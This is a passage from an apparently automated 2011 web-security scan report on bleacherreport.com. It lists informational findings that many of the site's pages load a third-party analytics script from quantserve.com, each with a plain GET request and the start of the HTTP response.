Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 35
ETag: "c679a79be99756d217a567940aff0526"
Date: Tue, 15 Feb 2011 15:57:15 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 29517
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.64. http://bleacherreport.com/pages/forum  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /pages/forum

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pages/forum HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 41
ETag: "4acd7ad8c3993c474fc2a99f3489776a"
Date: Tue, 15 Feb 2011 15:56:58 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 29713
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.65. http://bleacherreport.com/pages/privacy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /pages/privacy

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pages/privacy HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 53
ETag: "1768dfa5ac3cc82a63baa78cd227c4b0"
Date: Tue, 15 Feb 2011 15:56:42 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 41824
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.66. http://bleacherreport.com/pages/rewards  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /pages/rewards

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pages/rewards HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 28
ETag: "2d89a154267ad62c9deb85c13e6a33d4"
Date: Tue, 15 Feb 2011 15:57:06 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 33789
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.67. http://bleacherreport.com/pages/terms  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /pages/terms

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pages/terms HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 32
ETag: "0ac55140011e9ac010fed527c864e507"
Date: Tue, 15 Feb 2011 15:56:51 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 57982
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.68. http://bleacherreport.com/partners  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /partners

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /partners HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 28
ETag: "1c068a4ad2ad0c123d1e8296155257bc"
Date: Tue, 15 Feb 2011 15:56:38 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 30882
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.69. http://bleacherreport.com/press-room  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /press-room

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /press-room HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 42
ETag: "4d12fb6d689be2555ce4b5bc50207ce5"
Date: Tue, 15 Feb 2011 15:56:11 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 35860
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.70. http://bleacherreport.com/pro-wrestling  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /pro-wrestling

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pro-wrestling HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 99
ETag: "844e9e962fe57b9226387d8c8e1e507a"
Date: Tue, 15 Feb 2011 15:55:10 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 64412
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.71. http://bleacherreport.com/signup  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /signup

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /signup HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 48
ETag: "07351e796f62c2c33cc9bd4150d13dd0"
Date: Tue, 15 Feb 2011 15:54:15 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 31151
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.72. http://bleacherreport.com/soccer  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /soccer

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /soccer HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 107
ETag: "dde2da31b29e5442820e0663d3ce8d14"
Date: Tue, 15 Feb 2011 15:55:24 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 56445
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.73. http://bleacherreport.com/team  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /team

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /team HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 316
ETag: "f660286862a7e10319fdc0e0fbbf0d2b"
Date: Tue, 15 Feb 2011 15:56:03 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 44344
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.74. http://bleacherreport.com/tennis  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /tennis

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /tennis HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 327
ETag: "4916ed70b1ad2443b3058fdfd976f51c"
Date: Tue, 15 Feb 2011 15:54:22 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 72414
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.75. http://bleacherreport.com/tiger-woods  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /tiger-woods

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /tiger-woods HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 843
ETag: "813a9a803347f2664ed254b5ad129635"
Date: Tue, 15 Feb 2011 15:58:02 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 61934
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.76. http://bleacherreport.com/users/120343-eric-murtaugh  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /users/120343-eric-murtaugh

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /users/120343-eric-murtaugh HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 882
ETag: "baeaafe04ecefa509afa7a630e3df1ab"
Date: Tue, 15 Feb 2011 15:55:47 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 102246
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.77. http://bleacherreport.com/users/299610-hank-epton  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /users/299610-hank-epton

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /users/299610-hank-epton HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 701
ETag: "8be86ac81a40ed17fe032c95ef4b6c42"
Date: Tue, 15 Feb 2011 15:55:33 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 88394
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.78. http://bleacherreport.com/users/320822-trent-reinsmith  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /users/320822-trent-reinsmith

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /users/320822-trent-reinsmith HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 790
ETag: "bfc3c27c6adf9c39967613ba840c116e"
Date: Tue, 15 Feb 2011 15:55:49 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 104322
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.79. http://bleacherreport.com/users/331034-adam-fromal  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /users/331034-adam-fromal

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /users/331034-adam-fromal HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 1435
ETag: "01cb47a1dfef8e6fcae728da24e548df"
Date: Tue, 15 Feb 2011 15:55:57 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 105885
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.80. http://bleacherreport.com/users/347058-andrew-bailey  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /users/347058-andrew-bailey

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /users/347058-andrew-bailey HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 943
ETag: "71827f3306b741d66cfbf25d13fed0a8"
Date: Tue, 15 Feb 2011 15:55:56 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 107477
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.81. http://bleacherreport.com/users/350986-james-schmidt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /users/350986-james-schmidt

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /users/350986-james-schmidt HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 755
ETag: "657db09ff5c4d2e499c1639f85cef8c7"
Date: Tue, 15 Feb 2011 15:56:00 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 110587
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.82. http://bleacherreport.com/users/403844-vin-getz  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /users/403844-vin-getz

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /users/403844-vin-getz HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 754
ETag: "f215d003fe3858cb44a43a0935ef27d5"
Date: Tue, 15 Feb 2011 15:55:52 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 89944
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.83. http://bleacherreport.com/users/41310-kevin-mcgrady  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /users/41310-kevin-mcgrady

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /users/41310-kevin-mcgrady HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 676
ETag: "5398d99bb424b9fc54159730c4d7041b"
Date: Tue, 15 Feb 2011 15:55:53 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 106236
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.84. http://bleacherreport.com/users/413931-chris-sbalcio  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /users/413931-chris-sbalcio

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /users/413931-chris-sbalcio HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 1271
ETag: "cbad1c71df5243e689b41b0399b14b16"
Date: Tue, 15 Feb 2011 15:55:42 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 71986
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.85. http://bleacherreport.com/users/97803-tony-santorsa  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /users/97803-tony-santorsa

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /users/97803-tony-santorsa HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 934
